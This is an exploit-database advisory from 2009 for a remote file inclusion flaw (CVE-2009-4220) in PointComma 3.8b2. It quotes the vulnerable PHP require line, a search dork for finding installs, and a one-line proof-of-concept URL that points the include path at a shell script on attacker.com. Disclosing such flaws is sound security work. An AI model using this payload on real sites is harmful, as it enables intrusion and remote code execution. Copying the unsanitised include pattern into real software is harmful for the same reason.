[] NeoSense

pointcomma 3.8b2 - Remote File Inclusion

Author: cr4wl3r
type: webapps
platform: php
port: 
date_added: 2009-11-23 
date_updated:  
verified: 1 
codes: OSVDB-60843;CVE-2009-4220 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.compointcomma-v3.8b2.zip

   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#PointComma <= 3.8b2 Remote File Include Vulnerability
#Download Script      :  http://nchc.dl.sourceforge.net/project/pointcomma/pointcomma/
#Dork                 :  die("Hacking attempt");  :D
########################################################################
#
#Vuln : ./PointComma-3.8b2/includes/classes/pctemplate.php (line 14)
#       <?php
#          require($pcConfig['smartyPath'].'Smarty.class.php');
#       ?>
#PoC  :  http://server/[path]/includes/classes/pctemplate.php?pcConfig[smartyPath]=http://attacker.com/shell.txt?cmd
#
#
#
########################################################################
#Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix,
#        dan seluruh orang yang membenciku dan menyayangiku [I Love U Full] :*
########################################################################

/##############################################\
#   all member at  sekuritionline.net          #
#   all member at  manadocoding.net            #
\##############################################/

   [ Gorontalo / 2009 ]